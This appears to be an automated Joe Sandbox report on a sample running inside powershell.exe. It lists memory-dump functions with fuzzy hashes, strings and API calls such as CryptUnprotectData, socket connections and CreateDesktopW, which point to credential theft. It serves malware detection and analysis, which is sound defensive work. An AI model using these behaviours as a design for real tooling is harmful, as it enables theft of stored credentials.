Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279ac40ab2986d87fc421e6fd11ef77290421f65222c65410c0d5740af0745ef
Instruction ID: df33eb08b304d9947e1f7f937da8f27250ab9e3b4155cb47c98e82881af97f0c
Opcode Fuzzy Hash: 279ac40ab2986d87fc421e6fd11ef77290421f65222c65410c0d5740af0745ef
Instruction Fuzzy Hash: DAE0EC30E59308DFC784EFA8D94969CBBF8AB08201F5051AA980893258EB715B80DA81

Function 0093E510 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_930000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31182936b796ee2eddd6d786f55bea6d09d98c84fe4214613672a3291314213f
Instruction ID: 474bb06927d53a41a272b06b92f19e5a0d7af0c777c43bf42aee8df4b6745b2e
Opcode Fuzzy Hash: 31182936b796ee2eddd6d786f55bea6d09d98c84fe4214613672a3291314213f
Instruction Fuzzy Hash: B6E01274908208DBCB04DF94E9455BCBBB9EB85304F24D5D9DC0817385D732AE42DF81

Function 06C77370 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074874cac59c54f84c4fb1b89d4dad43f5f62eb64a07b7685f5009691fecfc70
Instruction ID: 6f1aacba6f7833bef48e99461a7f4affa155d5354e6c3cc20a64b422f0c627b2
Opcode Fuzzy Hash: 074874cac59c54f84c4fb1b89d4dad43f5f62eb64a07b7685f5009691fecfc70
Instruction Fuzzy Hash: 12E0EC34908208DBC744DF95D9456ACBBB8AB85304F1081D9DC4817345D7329A52DBA1

Function 06E40B08 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194251877.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a768379c3a4fbc20cffda611944ec7d0c0845f17812a5a8c8603c5f249a611
Instruction ID: c2a30ebc8a98ee825a30123c626b8aca0734fadade67f7507b4e57b4354f05da
Opcode Fuzzy Hash: 48a768379c3a4fbc20cffda611944ec7d0c0845f17812a5a8c8603c5f249a611
Instruction Fuzzy Hash: 0AE0EC34908208EBC744EFA4E9455ACBBB8AB85308F10D5EDD80857355CB325A52DA85

Function 06C74758 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e1dd4588b7424c35672a2352d55e55abe7426a0d3b0bc9bcb78050ad1c923a
Instruction ID: 0f0d019f297fad51026a482b01e72e99d9d948be1c76750612aa30018348fef6
Opcode Fuzzy Hash: 83e1dd4588b7424c35672a2352d55e55abe7426a0d3b0bc9bcb78050ad1c923a
Instruction Fuzzy Hash: 5FD0A734908108DFC748DB94D941A69B3FDEB86204F10C0DDDC0843351CB339E02DAC1

Function 00937433 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_930000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee3b3c230bde0130ab46cf7e5fc94e1533531d45327a989741c36b13df72361
Instruction ID: c299058f0bb2b2c2a35e8758f526ac73594d287c7f533713b0c3816c3a3b241b
Opcode Fuzzy Hash: 3ee3b3c230bde0130ab46cf7e5fc94e1533531d45327a989741c36b13df72361
Instruction Fuzzy Hash: BED05E2100D3884FD72663B09C2979C3F656B42352F0541DBE049820B3C69A0984DB22

Function 009335E0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_930000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a933bcc5dc635da258992ed047379f3469359970a0ca54a540c78a72abb1858
Instruction ID: 7dcaba70e4a04b5bc77ffa87e0d3a4de154b996ef323433246b67982542ee517
Opcode Fuzzy Hash: 3a933bcc5dc635da258992ed047379f3469359970a0ca54a540c78a72abb1858
Instruction Fuzzy Hash: 9FC012B86050405FD3419558DC8195577919BC8305B04C0AD78088B157D7129C139581

Function 06C30160 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8db140845cdfbe0b642320efadbd0ca9516d9f0de58f6069cf8f3fd155b6c7c
Instruction ID: 889077d9fe07592b4bfec1aba9223bb17a224b910db34baa4b876909c7feafea
Opcode Fuzzy Hash: b8db140845cdfbe0b642320efadbd0ca9516d9f0de58f6069cf8f3fd155b6c7c
Instruction Fuzzy Hash: 15C01224C8F3C02BCB1B4B716C68B89BF304B43601F0900CBB1A1AB0F3A4800258CB62

Function 06E666B2 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b167621ccf06ebccb081915cb4d450d7d23e478e5319b6f4f935ee22b7019e8
Instruction ID: c414075a40c12c19fe48554171363c8d9703d9d8289e1a420f6cd9fe1068c1a0
Opcode Fuzzy Hash: 0b167621ccf06ebccb081915cb4d450d7d23e478e5319b6f4f935ee22b7019e8
Instruction Fuzzy Hash: 35D0C9AAA091016BD310C660C891907B7A69BD5250F24C4A99849872AAEA32DD17CAD5

Function 00937440 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_930000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc0ac45c344b780a5f6e6f1e04b79353d6033c7561122dd59a17e674fc9d8a4
Instruction ID: ee329d0f41a1a17e0e808e691ade45608c5c7fa66ee2217128dc1b250c9d3aac
Opcode Fuzzy Hash: fcc0ac45c344b780a5f6e6f1e04b79353d6033c7561122dd59a17e674fc9d8a4
Instruction Fuzzy Hash: 96C08C2001860887DA2433E0E80E36C72AD6B40322F808061F00C010718BA95880E9AA

Function 06E67268 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039f1a2232de7516d53757eb8679538cbfdf58e0f10cd97007a22d67fecdab55
Instruction ID: 9e48c29beca946cfe3a0529e1769be91858c2a9dc33bbeb92d25cbec39b1488c
Opcode Fuzzy Hash: 039f1a2232de7516d53757eb8679538cbfdf58e0f10cd97007a22d67fecdab55
Instruction Fuzzy Hash: F9C04C76E5002E9BCF00DBD9E4408DCF774EF94321F404036D214AB118D6301526CF50

Non-executed Functions

Function 06C74860 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e220e3261f1aadb7f19eb255ed20777b9a35e54e91d20872d3cb8d317064d5d9
Instruction ID: d888ffdd4d149eabd3f6aa86f9f41bf3e828c39d858fba41cb2d73002820b5b0
Opcode Fuzzy Hash: e220e3261f1aadb7f19eb255ed20777b9a35e54e91d20872d3cb8d317064d5d9
Instruction Fuzzy Hash: 0D912870E15208CFEB68DFAAD5847ADBBF2FB88301F108169D409A7394DB745986CF81

Function 06C74851 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87688ee5343457b3e1f698ec7f242f4fec1415bd84532ff53db952058cffe1b0
Instruction ID: ec4350a1f58a3e62ef6e09e3478a57785fb1b175317a0cbf3a0b8383a15c6778
Opcode Fuzzy Hash: 87688ee5343457b3e1f698ec7f242f4fec1415bd84532ff53db952058cffe1b0
Instruction Fuzzy Hash: 65914A70E15208CFDB68DFA9D5847ADBBF2FB88301F108169D409A7394DB345986CF81

Function 06C75210 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c458365be640cc435e9728b2e436f980f13bbd963d0df950fa16b5fbded75fb
Instruction ID: 52605c5a8c6149279bd2acf359eac7016cb602e6b725f16d7afa26c3963b4581
Opcode Fuzzy Hash: 1c458365be640cc435e9728b2e436f980f13bbd963d0df950fa16b5fbded75fb
Instruction Fuzzy Hash: 07515A70E19208CFDB54CFA9D4487EDBBF6FB49301F549129D00AA7294DB745946CF84

Function 06C7520E Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a5eeb544b2f9a605c7e540c1d5eed1f559ab123806ca6c6f45b32af5e6c59c3
Instruction ID: eea7badbaea7b93cfa26f26d96b72e08a9398bb34fa6cb9a676f70ccc073a64e
Opcode Fuzzy Hash: 1a5eeb544b2f9a605c7e540c1d5eed1f559ab123806ca6c6f45b32af5e6c59c3
Instruction Fuzzy Hash: 5F514870E15208CFEB54CFA9D8487EDBBF2FB89301F54912AE00AA7294DB744946CF84

Function 06C75416 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ef31a6f45ea60cb2945c3c74b72d489a57675ac7dbe0a58d845cb4b003d4e5
Instruction ID: b34e52bb2e39208d51a3e1937db54712e71a450a6a413c4425916ee3294090df
Opcode Fuzzy Hash: f4ef31a6f45ea60cb2945c3c74b72d489a57675ac7dbe0a58d845cb4b003d4e5
Instruction Fuzzy Hash: A2414770E19208CFDB54DFA9D4887EDBBF2FB49301F64902AE00AA7294DB745946CF84

Function 07319E68 Relevance: 10.5, Strings: 8, Instructions: 487COMMON

Download Yara Rule

Strings

x/j, xrefs: 0731A1A4
G,j, xrefs: 0731A017
G,j, xrefs: 0731A259
G,j, xrefs: 0731A021
x/j, xrefs: 0731A1B2
G,j, xrefs: 0731A24F
P0*j, xrefs: 07319ED2
P0*j, xrefs: 07319EC8

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: P0*j$P0*j$x/j$x/j$G,j$G,j$G,j$G,j
API String ID: 0-2997598138
Opcode ID: f4ff042bd0f6be04b0f758a9ba313f6443791c0d290136bc4792b14dc6be7d3d
Instruction ID: 353d843d5011f729911d452d3c5b7911fefd98cf4929dd379c86076aa1e8e840
Opcode Fuzzy Hash: f4ff042bd0f6be04b0f758a9ba313f6443791c0d290136bc4792b14dc6be7d3d
Instruction Fuzzy Hash: B2F13BB1705209DFEB1D8F64C8147AEBBF6AF86211F14C06AE9099B251DB36DC41C762

Function 06C64D78 Relevance: 7.8, Strings: 6, Instructions: 336COMMON

Download Yara Rule

Strings

G,j, xrefs: 06C64DF8
PHj, xrefs: 06C6514B
PHj, xrefs: 06C6513D
G,j, xrefs: 06C64E02
P0*j, xrefs: 06C64EEB
P0*j, xrefs: 06C64EE1

Memory Dump Source

Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID: P0*j$P0*j$PHj$PHj$G,j$G,j
API String ID: 0-3515970772
Opcode ID: 3a471353a27abe6c573017ebb9b8cfd4b7bb5c047e78e8f111a2f8b2680ec663
Instruction ID: 471b60b832cfaa142a4a15ecd29c2b8dfa3eb3e820de233ab0e14c0a23f9b0a4
Opcode Fuzzy Hash: 3a471353a27abe6c573017ebb9b8cfd4b7bb5c047e78e8f111a2f8b2680ec663
Instruction Fuzzy Hash: 58C1C231B00208DFDB98CF66C480A6AB7F2AF89210F65C06DE9059B395CA31DD41CBA6

Function 073181D8 Relevance: 5.3, Strings: 4, Instructions: 339COMMON

Download Yara Rule

Strings

G,j, xrefs: 07318401
G,j, xrefs: 0731820C
G,j, xrefs: 073183F7
G,j, xrefs: 07318216

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: G,j$G,j$G,j$G,j
API String ID: 0-3326077981
Opcode ID: f56cad0ff6d5dbd63a582a97f8016f49a92dbeb6c7b19023453db7ec1e0fd874
Instruction ID: 8cbf051ea871a1b47459380158c7aaced700b7b22f3757b0f4bcbb431d568cd5
Opcode Fuzzy Hash: f56cad0ff6d5dbd63a582a97f8016f49a92dbeb6c7b19023453db7ec1e0fd874
Instruction Fuzzy Hash: 1BB16BB5B042158FEB199A7998107EBBBE6DFC6320F24847AD90ADF241DE31DC41C395

Function 0731A570 Relevance: 5.3, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

G,j, xrefs: 0731A783
G,j, xrefs: 0731A5AD
G,j, xrefs: 0731A5A3
G,j, xrefs: 0731A78D

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: G,j$G,j$G,j$G,j
API String ID: 0-3326077981
Opcode ID: 216e6c816b297b607c5afa87c5f33a582a6bad8dfce4422279be823eb31f4ab2
Instruction ID: d1edbd1ff5d7d1b7ce8562dc4e90e539588d582e7d08a3cf9fd3d3b28316abe7
Opcode Fuzzy Hash: 216e6c816b297b607c5afa87c5f33a582a6bad8dfce4422279be823eb31f4ab2
Instruction Fuzzy Hash: B99158B1B05306CFEB29DA6984106AABBF6AFC6212F14C07BD50DCB651DB31C842CB91

Analysis Process: powershell.exePID: 9160, Parent PID: 5004COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.5%
Total number of Nodes:	383
Total number of Limit Nodes:	20

Executed Functions

Function 00437DF0 Relevance: 30.4, APIs: 12, Strings: 5, Instructions: 640
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32 ref: 00438034
SysAllocString.OLEAUT32()\"^), ref: 004380C3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
SysAllocString.OLEAUT32()\"^), ref: 0043817E
SysAllocString.OLEAUT32()\"^), ref: 00438238
VariantInit.OLEAUT32 ref: 004382A8
VariantClear.OLEAUT32(?), ref: 004383F9
SysFreeString.OLEAUT32(?), ref: 00438410
SysFreeString.OLEAUT32 ref: 0043841D
SysFreeString.OLEAUT32 ref: 00438423
SysFreeString.OLEAUT32 ref: 00438430
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468

Strings

)\"^, xrefs: 004380BE, 004380C2, 0043817D, 00438237, 0043845B
pq, xrefs: 004382E2
P%R, xrefs: 0043804A
.H4J, xrefs: 0043805A
O@, xrefs: 0043806A

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 1341229144-1397720406
Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OU, xrefs: 00423CFC
{\}, xrefs: 00423E3E
/G$I, xrefs: 00423E16
WE, xrefs: 00423D04
A[, xrefs: 00423D14
7N1@, xrefs: 00423ED0, 00423EE1
Fg)i, xrefs: 00423E56

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF

Strings

<I2K, xrefs: 00415C2B
RXA, xrefs: 00415842
~, xrefs: 0041596E
oA&C, xrefs: 00415CE6
X, xrefs: 00415DD2
NDNK, xrefs: 00415D85
8MNO, xrefs: 00415C36

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 834300711-3328159043
Opcode ID: 6aebcbfd9c355da98518a936545505709d3db2e328049cf977e2e71255f2f4eb
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 6aebcbfd9c355da98518a936545505709d3db2e328049cf977e2e71255f2f4eb
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 0041E7C0 Relevance: 11.3, APIs: 2, Strings: 4, Instructions: 779
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,?,?,?), ref: 0041E854
socket.WS2_32(?,?,?), ref: 0041E8D0

Strings

", xrefs: 0041F121
hI, xrefs: 0041E98F
-+, xrefs: 0041F11A
/, xrefs: 0041E9BE

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: getaddrinfosocket
String ID: "$-+$/$hI
API String ID: 1630306000-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 0041B2E0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDesktopW.USER32(?,00000000,00000000,00000000,000F00C7,00000000), ref: 0041B605

Strings

_, xrefs: 0041B428
+|-~, xrefs: 0041B306
/pqr, xrefs: 0041B30E

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: CreateDesktop
String ID: +|-~$/pqr$_
API String ID: 3054513912-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

Q, xrefs: 00431853
B, xrefs: 0043188F
H, xrefs: 004318AD
, xrefs: 0043183F
n, xrefs: 004318D1
m, xrefs: 004318B7
0, xrefs: 00431980
0, xrefs: 0043182B
], xrefs: 00431849
^, xrefs: 0043185D
4, xrefs: 00431821
J, xrefs: 00431885
O, xrefs: 0043187B
#, xrefs: 00431899
~, xrefs: 004318C1
B, xrefs: 00431871
{, xrefs: 004318E1
;, xrefs: 00431817
/, xrefs: 00431867
G, xrefs: 004318A3

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 00430758 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00430761

Strings

0, xrefs: 0043090A

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 3105f6317aa136daeee14573320fe7428ce014bf8f2ecab488f271abe27fc21a
Instruction ID: a094da954053901be58a768e712714aa916a7f14eaab1c75cde4f4bd701cd36d
Opcode Fuzzy Hash: 3105f6317aa136daeee14573320fe7428ce014bf8f2ecab488f271abe27fc21a
Instruction Fuzzy Hash: A571B260008BD28EC366CB3D89589057FA16B6B230B4A87D8E0FA4F7F7D265D506C766

Function 00436145 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436165

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
Instruction ID: 741c48333e69648009e785c6466c575ff7d71c05fd411e4f0ced63eefbf4b49a
Opcode Fuzzy Hash: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
Instruction Fuzzy Hash: 86115B32D052968FDB14CB3C8C502ADBFB15F8A320F1983EDD8A5A33D5D9304E428B51

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
